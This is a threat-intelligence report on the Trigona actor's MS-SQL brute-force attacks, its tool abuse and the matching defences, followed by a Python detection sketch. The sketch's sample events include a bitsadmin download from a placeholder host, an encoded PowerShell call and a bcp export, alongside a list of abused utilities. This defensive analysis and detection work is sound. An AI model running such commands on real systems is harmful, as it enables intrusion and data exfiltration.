Analysis of Trigona Threat Actor's Latest Attack Cases
NetmanageIT OpenCTI - opencti.netmanageit.com
SUMMARY:
The Trigona threat actor continues to target MS-SQL servers through brute-force and dictionary attacks, exploiting weak credentials. They use CLR Shell for additional payloads and employ various tools like BCP, Curl, Bitsadmin, and PowerShell to install malware. The attackers utilize remote control tools such as AnyDesk, RDP, and possibly Teramind. New scanner malware written in Rust targets RDP and MS-SQL services. The threat actor also uses tools like SpeedTest and a custom StressTester. Various privilege escalation and file manipulation tools are employed. To protect against these attacks, administrators should use complex passwords, regularly update security software, and implement firewalls to control access to database servers.
OPENCTI LABELS:
remote-control, ransomware, trigona
AI COMMENTARY:
1. Analysis of Trigona Threat Actor’s Latest Attack Cases
The Trigona threat actor, known for its relentless targeting of enterprise environments, has once again made headlines by focusing on MS-SQL servers. In their latest series of attacks, they exploit weak or default credentials using brute-force and dictionary methods to gain initial access. By zeroing in on misconfigured login policies, Trigona continues to reveal the importance of strong authentication and careful credential management when it comes to database security.
2. Attack Methods and Credential Exploitation
After achieving entry through compromised or weak credentials, Trigona operators deploy a CLR Shell to deliver additional payloads directly into the target environment. This method enables them to sidestep traditional antivirus detections and execute code within the context of the database process. Their choice of MS-SQL servers highlights a wider trend in threat intelligence where attackers pursue high-value data sources that often lack rigorous patching and monitoring.
3. Payload Deployment Tools
Trigona’s toolbox includes a variety of legitimate administrative utilities repurposed for malicious intent. BCP is abused for data exfiltration, Curl and Bitsadmin for downloading and uploading files, and PowerShell scripts for orchestrating complex payload chains. By leveraging trusted system tools, the threat actor minimizes the chance of triggering security alerts. The seamless integration of these utilities underscores a critical need for defenders to monitor command-line usage and unusual process invocations on database hosts.
4. Remote-Control and Scanner Malware
Beyond initial compromise, Trigona frequently resorts to remote-control platforms such as AnyDesk and RDP, and in some instances appears to deploy Teramind for covert monitoring. Recently discovered scanner malware, written in Rust, extends their reach by probing RDP and MS-SQL services across networks. This new tool automates vulnerability discovery and credential testing at scale, accelerating lateral movement and reducing the time to full network compromise.
5. Stress Testing and Privilege Escalation Utilities
In addition to reconnaissance and remote control, Trigona employs performance measurement tools like SpeedTest and a bespoke StressTester to assess network bandwidth and system resilience. Meanwhile, custom privilege escalation and file manipulation utilities enable them to elevate access and modify or delete critical files. This multi-tool approach allows the threat actor to strengthen persistence and inflict maximum disruption once inside the environment.
6. Defense Strategies and Best Practices
To defend against the evolving Trigona threat, administrators must enforce complex, unique passwords for all database accounts and implement account lockout policies to thwart brute-force and dictionary attacks. Regularly updating security software and applying patches can neutralize known vulnerabilities exploited during CLR Shell deployment. Network segmentation and firewalls should be configured to restrict direct access to MS-SQL and RDP services from untrusted networks. Finally, continuous monitoring of administrative tools, command-line parameters, and remote-control sessions is essential for rapid detection and response to these sophisticated intrusion attempts.
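The two monitoring points the commentary calls out in sections 3 and 6 (command-line usage and process invocations on database hosts, and lockout-worthy bursts of failed logins) can be turned into concrete detection logic. The following is an added example, not code from the report or from NetmanageIT: it runs two checks over constructed sample telemetry. The first flags BCP, Curl, Bitsadmin, PowerShell or cmd.exe being spawned by the SQL Server process (sqlservr.exe), which is how CLR Shell payload delivery would surface on the host; the second flags a burst of failed MS-SQL logins from one source within a short window, which is the brute-force stage. The field names (parent_image, image, cmdline, src_ip, ts, success) and the sample IPs and paths are assumptions chosen for the example; map them onto your own EDR or event-log schema.

```python
"""Detection sketch for the Trigona tradecraft described in the report.

Added example (not the report's or NetmanageIT's code). All telemetry below
is constructed; field names are assumptions to be mapped to a real schema.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Utilities the report names as abused on database hosts, plus the shells that
# usually launch them. Matched case-insensitively against the image basename.
SUSPICIOUS_CHILDREN = {"bcp.exe", "curl.exe", "bitsadmin.exe", "powershell.exe", "cmd.exe"}
SQL_SERVER_IMAGE = "sqlservr.exe"

# Constructed sample process-creation events (not real telemetry).
_SQLSERVR = r"C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\sqlservr.exe"
PROCESS_EVENTS = [
    {"ts": "2024-05-01T10:00:01", "host": "db01", "parent_image": _SQLSERVR,
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c bitsadmin /transfer job http://PLACEHOLDER/file C:\\Windows\\Temp\\file"},
    {"ts": "2024-05-01T10:00:03", "host": "db01", "parent_image": _SQLSERVR,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -enc PLACEHOLDER"},
    # Benign: an administrator opening PowerShell from the desktop; must not fire.
    {"ts": "2024-05-01T10:00:05", "host": "db01", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe"},
    {"ts": "2024-05-01T10:00:09", "host": "db01", "parent_image": _SQLSERVR,
     "image": r"C:\Program Files\Microsoft SQL Server\Client SDK\ODBC\170\Tools\Binn\bcp.exe",
     "cmdline": "bcp.exe PLACEHOLDER out C:\\Windows\\Temp\\out.dat -T"},
]

# Constructed sample MS-SQL login events: 12 failures from one source in 22 s,
# plus one failure and one success from a second, legitimate-looking source.
LOGIN_EVENTS = [
    {"ts": f"2024-05-01T09:59:{s:02d}", "src_ip": "203.0.113.7", "login": "sa", "success": False}
    for s in range(0, 24, 2)
] + [
    {"ts": "2024-05-01T09:58:10", "src_ip": "198.51.100.4", "login": "appuser", "success": False},
    {"ts": "2024-05-01T09:58:40", "src_ip": "198.51.100.4", "login": "appuser", "success": True},
]


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def flag_sql_spawned_lolbins(events):
    """Return (host, child image, cmdline) for LOLBins whose parent is sqlservr.exe."""
    hits = []
    for e in events:
        if _basename(e["parent_image"]) == SQL_SERVER_IMAGE and _basename(e["image"]) in SUSPICIOUS_CHILDREN:
            hits.append((e["host"], _basename(e["image"]), e["cmdline"]))
    return hits


def flag_login_bursts(logins, threshold=10, window=timedelta(minutes=1)):
    """Map src_ip -> peak count of failed logins inside any sliding `window`,
    for sources whose peak reaches `threshold`. Successful logins are ignored."""
    by_src = defaultdict(list)
    for rec in logins:
        if not rec["success"]:
            by_src[rec["src_ip"]].append(datetime.fromisoformat(rec["ts"]))
    bursts = {}
    for src, times in by_src.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1
            count = end - start + 1
            if count >= threshold:
                bursts[src] = max(bursts.get(src, 0), count)
    return bursts


if __name__ == "__main__":
    for host, child, cmd in flag_sql_spawned_lolbins(PROCESS_EVENTS):
        print(f"[process] {host}: sqlservr.exe spawned {child}: {cmd}")
    for src, peak in flag_login_bursts(LOGIN_EVENTS).items():
        print(f"[login] {src}: {peak} failed SQL logins within one minute")
```

The first check deliberately keys on the parent process rather than on the tool name alone, because the same binaries are routine in administrators' hands; only their appearance as children of the database engine matches the CLR Shell pattern the report describes. The second check is the telemetry side of the account-lockout recommendation: a lockout policy stops the burst, but the burst itself is still the signal that someone is running a dictionary against the server.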